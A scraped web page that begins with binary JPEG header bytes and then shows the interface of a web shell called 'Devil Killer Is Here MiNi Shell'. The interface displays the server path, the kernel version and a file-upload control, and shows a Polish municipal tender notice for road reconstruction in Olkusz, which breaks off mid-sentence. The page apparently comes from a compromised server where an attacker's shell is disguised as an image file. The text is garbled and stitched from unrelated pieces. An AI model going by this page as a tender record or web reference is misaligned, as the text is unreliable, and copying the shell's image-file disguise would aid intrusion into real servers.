JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231016/0044596301-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg i chodników w Gminie Olkusz </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Olkusz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276258010</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olkusz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL21A - Oświęcimski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetarg@umig.olkusz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umig.olkusz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg i chodników w Gminie Olkusz </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ab7abc16-69ad-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00445963</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00024945/10/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.11 Przebudowa dróg i chodników w Gminei Olkusz</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/olkusz <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl. Szczegółowe informacje o środkach komunikacji elektronicznej oraz osobach uprawnionych do komunikowania się z wykonawcami określone zostały w rozdziale III.1 SWZ. adres strony: https://platformazakupowa.pl/pn/olkusz</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Oferta oraz przedmiotowe środki dowodowe (jeżeli były wymagane) składane elektronicznie muszą zostać podpisane elektronicznym kwalifikowanym podpisem lub podpisem zaufanym lub podpisem osobistym. W procesie składania oferty, wniosku w tym przedmiotowych środków dowodowych na platformie, kwalifikowany podpis elektroniczny wykonawca może złożyć bezpośrednio na dokumencie, który następnie przesyła do systemu (opcja rekomendowana przez platformazakupowa.pl) oraz dodatkowo dla całego pakietu dokumentów w kroku 2 Formularza składania oferty lub wniosku (po kliknięciu w przycisk Przejdź do podsumowania). Podpisy kwalifikowane wykorzystywane przez wykonawców do podpisywania wszelkich plików muszą spełniać „Rozporządzenie Parlamentu Europejskiego i Rady w sprawie identyfikacji elektronicznej i usług zaufania w odniesieniu do transakcji elektronicznych na rynku wewnętrznym (eIDAS) (UE) nr 910/2014- od 1 lipca 2016 roku”. W przypadku wykorzystania formatu podpisu XAdES zewnętrzny. Zamawiający wymaga dołączenia odpowiedniej ilości plików, podpisywanych plików z danymi oraz plików XAdES. Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. Niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.: a. stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s, b. komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows7, Mac Os x 10 4, Linux, lub ich nowsze wersje, c. zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 100., d. włączona obsługa JavaScript,e. zainstalowany program Adobe crobatReader lub inny obsługujący format plików .pdf, f. Platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8, g. Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. 8. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego: a. akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący, b. zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. Zamawiający rekomenduje wykorzystanie formatów:. pdf.doc.xls.jpg (.jpeg) ze szczególnym wskazaniem na .pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: a. .zip b. .7Z Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp .numbers.pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu, zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem podpisywanym. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze skompresowanych plików. Szczegółowe informacje w tym zakresie określono w rodz. II.11 i III.2 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119 z 04.05.2016, str. 1 z późn. zm.), dalej „RODO”, informuję, że: 1. administratorem Pani/Pana danych osobowych jest Gmina Olkusz, Rynek, 32-300 Olkusz; 2. inspektorem ochrony danych osobowych w Urzędzie Miasta i Gminy w Olkuszu jest Jarosław Cieślik, Rynek 1, pok. 209, 32-300 Olkusz, tel. 326260209, mail: j.cieslik@umig.olkusz.pl; 3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego: Przebudowa dróg i chodników w Gminie Olkusz; 4. odbiorcami pani/pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy – Prawo zamówień publicznych; 5. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy; 6. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; 7. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8. posiada Pani/Pan:- na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych *;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO **; - prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9. Nie przysługuje Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;- prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;- na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit.c RODO. 10. Na podstawie art. 75 i art. 19 ust. 3 ustawy Pzp oraz zgodnie z RODO: - w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z art. 19 ust. 2 ustawy Pzp skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą; Prawo do ograniczenia przetwarzania danych (art. 18 RODO), przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego prawa. Zgodnie z art. 19 ust. 3 Pzp w postępowaniu o udzielenie zamówienia zgłoszenie rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">KBZ.271.2.37.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">6</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania: Budowa dróg transportu rolnego - Droga w Zedermanie nr działki 759/1&#34;<br/>Zakres prac Części 1 obejmuje w szczególności: <br/> - roboty przygotowawcze i rozbiórkowe z odwozem materiałów z rozbiórki wraz z utylizacją,<br/> - roboty ziemne,<br/> - wyrównanie istniejącej podbudowy kruszywem (średnia grubość wyrównania po <br/> zagęszczeniu około 10 cm), <br/> - ułożenie nawierzchni z betonu asfaltowego w układzie warstw: warstwa wiążąca 4,0 cm <br/> warstwa ścieralna 4,0 cm <br/> - prace wykończeniowe i porządkowe obustronne pobocza grubości warstwy po <br/> zagęszczeniu 8,0 cm i szer. około 25 cm, <br/> - wykonanie robót towarzyszących tym pracom. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną ustalone w drodze negocjacji z Wykonawcą.<br/>4)	Istotne postanowienia umowy o udzielenie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, inne niż określone w pkt 3, będą zgodne z istotnymi postanowieniami umowy zawartymi w umowie dla zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami:<br/>1) Cena – Pc - 60 pkt<br/>2) Okres gwarancji – Pg - 40 pkt<br/>Oferty oceniane będą punktowo. W trakcie oceny ofert kolejno rozpatrywanym i ocenianym ofertom przyznawane będą punkty wg poniższego wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – łączna liczba punktów przyznanych badanej ofercie<br/>Pc – liczba punktów przyznanych ofercie w kryterium cena<br/>Pg – liczba punktów przyznanych ofercie w kryterium okres gwarancji<br/>Pc - w kryterium ceny, oferty będą oceniane wg poniższego wzoru:<br/>Pc = Cmin/Co * 60 pkt<br/>gdzie:<br/>Cmin- najniższa cena oferty brutto spośród wszystkich ocenianych ofert<br/>Co - cena brutto oferty ocenianej<br/>Maksymalna ilość punktów możliwych do uzyskania w kryterium cena wynosi 60.<br/>Pg – w kryterium okres gwarancji, oferty będą oceniane wg poniższego wzoru:<br/>Pg = Gbad/Gmax * 40 pkt<br/>gdzie:<br/>Gbad – Okres gwarancji na przedmiot zamówienia zaoferowany w ofercie badanej<br/>Gmax - najdłuższy zaoferowany okres gwarancji na przedmiot zamówienia spośród wszystkich badanych ofert<br/>Zamawiający wymaga, aby Wykonawca udzielił minimum 36 miesięcy okresu gwarancji liczonego od dnia podpisania protokołu odbioru końcowego robót budowlanych. Maksymalny oceniany przez Zamawiającego okres gwarancji wynosi 60 miesięcy. Za udzielenie minimalnej gwarancji 36 - miesięcznej przyznaje się 0 punktów. Jeżeli Wykonawca udzieli dłuższego niż maksymalny oczekiwany okres gwarancji. Zamawiający do oceny oferty przyjmie maksymalny oczekiwany okres gwarancji tj. 60 miesięcy, a do umowy przyjmie okres gwarancji wpisany w formularzu ofertowym. Jeżeli Wykonawca nie wskaże w ofercie okresu gwarancji, Zamawiający do oceny oferty i umowy przyjmie minimalny okres gwarancji tj. 36 m-cy. Jeżeli Wykonawca udzieli krótszego okresu gwarancji niż minimalny (36 mcy), to jego oferta zostanie odrzucona. Maksymalna ilość punktów możliwych do uzyskania w kryterium okres gwarancji wynosi 40.<br/>Zamawiający oceni i porówna jedynie te oferty, które zostaną określone jako zgodne z wymaganiami określonymi w niniejszej specyfikacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót budowlanych w ramach zadania: Budowa dróg transportu rolnego - Droga w Zedermanie nr działki 756.<br/>Zakres prac Części 2 obejmuje w szczególności: <br/>- roboty przygotowawcze, rozbiórkowe z odwozem materiałów z rozbiórki wraz <br/> z utylizacją, <br/>- roboty ziemne,<br/>- profilowanie i zagęszczanie mechaniczne koryta,<br/>- wyrównanie istniejącej podbudowy na średnią grubość około 5,0 cm,<br/>- ułożenie nawierzchni z betonu asfaltowego w układzie warstw: warstwa wiążąca 4,0cm i warstwa ścieralna 4,0 cm,<br/>- prace wykończeniowe obustronne pobocza o grubości warstwy po zagęszczeniu 8,0 cm i szer. około 25 cm i prace porządkowe plantowanie ręczne terenu. <br/> - wykonanie robót towarzyszących tym pracom </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <p class="mb-0">34922100-7 - Oznakowanie drogowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówienia z wolnej ręki, zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp (w okresie 3 lat od dnia udzielenia zamówienia podstawowego), dotychczasowemu Wykonawcy robót budowlanych. Przewidywane zamówienie będzie polegało na powtórzeniu podobnych robót budowlanych (wydłużeniu przebudowywanego odcinka drogi lub chodnika) jak w zamówieniu podstawowym, zgodnie z przedmiotem zamówienia podstawowego. Przewiduje się możliwość wykorzystania wszystkich rodzajów prac określonych w przedmiarze robót. Zamówienie podobne będzie obejmować max. 50 % zakresu rzeczowego zamówienia podstawowego<br/>Warunki udzielenia zamówienia podobnego, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp:<br/>1)	Wykonawca wykonał należycie roboty budowlane objęte niniejszym postępowaniem , <br/>2)	Wykonawca zapewni wykonanie zamówienia, o którym mowa w art. 214 ust. 1 pkt 7 ustawy Pzp w standardzie nie gorszym niż przyjęty do wykonania podstawowego,<br/>3)	Wysokość wynagrodzenia i termin wykonania zostaną 